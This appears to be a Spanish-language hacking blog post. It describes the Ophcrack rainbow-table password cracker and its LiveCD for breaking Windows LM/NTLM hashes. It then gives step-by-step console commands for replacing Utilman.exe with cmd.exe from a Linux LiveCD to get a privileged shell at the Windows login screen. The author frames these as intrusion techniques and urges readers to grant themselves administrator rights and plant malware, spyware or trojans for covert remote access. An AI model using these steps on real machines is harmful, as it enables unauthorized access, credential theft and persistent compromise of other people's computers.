Cr@ackin passwords en Sistemas Microsoft
Existen vastantes dormas y tecnicas de recuperacion de passwords en los sistemas de Microsoft en este caso mas especifico sobre accesos al sistema vulnerando el login automatico, ya sea remoto el ataque o mediante acceso a la maquina via LiveCD o mediante consola en sus diferentes sistemas operativos.
Como primer ejemplo mi querida herramienta:
Ophcrack es una herramienta para crackear las contraseñas de Windows basada en las tablas Rainbow. Es una implementación muy eficiente de las tablas rainbow hecha por los inventores de este método. Viene con una Interfaz Gráfica de Usuario GTK+ y corre bajo Windows, Mac OS X (CPU Intel) y también en Linux.
Ophcrack 2.3.4 – 2007-02-19 Soporte para Vista Bkhive 1.1.0 Samdump2 1.1.0 Soporte para crackear hashes LM con caracteres alemanes Facilidad de cambiar las tablas en el LiveCD
Características
* » Corre bajo Windows, Linux y Mac OS X (intel). * » Rompe hashes LM y NTLM. * » Tablas libres disponibles para hashes LM alfanuméricos. * » Carga hashes desde SAM local y SAM remota. * » Carga hashes desde SAM cifradas recuperadas desde una partición Windows, incluyendo Vista.
Ophcrack LiveCD 1.1.4 – 2007-02-19
El LiveCD de Ophcrack contiene un sistema Linux completo (SLAX), ophcrack para Linux y las tablas Rainbow para contraseñas alfanuméricas.
El liveCD crackea las contraseñas automáticamente, sin necesidad de una instalación y sin la necesidad de conocer la contraseña de administrador (solo es necesario arrancar desde el CD).
Mediante LiveCD existen muchas otras formas una de las mas sencillas para aquellas personas q usan windows vista he aqui una vulnerabilidad:
Es muy facil solo modificando el nombre de un fichero del sistema tenemos acceso a la maquina como root o administrador , estando ahi , saltandonos la proteccion de acceso podemos abrir una consola y darnos privilegios como adminsitrador o dejar un huevo o algun malware o spyware para acceder remotamente, las posivilidades son infinitas a continuacion lo tan esperado…
1.- Accedemos mediante un LiveCD unix… sea linux o cualquier otra distro.. por ejemplo los CD’s q regala Canonical de Ubuntu
2.- Estando en modo LiveCD escribimos esto mediante una consola..
cd /mnt —Montando unidades
ls ….Muestra las unidades
cd sda1 …Especificamos q la unidad sda1 q usualemte suele ser Unidad C
cd Windows/System32 —-Accedemos al directorio del sistema
mv Utilman.exe Utilman.old —-Modificamos nombre d el famoso Utilman
cp cmd.exe Utilman.exe —–Como final tenemos un MS-DOS falso
reboot —–Reiniciamos….
Estando en el login de WIndows cuando os pida el password solo presionamos Ctrol+U y wuala!!! tenemos acceso al escritorio ahora estando ahi podemos darnos nivel como administrador u otros beneficios..
quier
Por ejemplo: Ejecutar: control userpasswords2 y darnos privilegios, o en msdos mediante whoami o ntuser por igual o remotamente mediante uso de spyware o troyanos d tipo ftp o smtp para no ser detectados..
Por ahora es todo: Ando algo atareado con mis maquinas pero prometo publicar formas de Intrusion mediante redes inalabricas como Bluetooth ,WI-fi y GSM realmente interesantes!
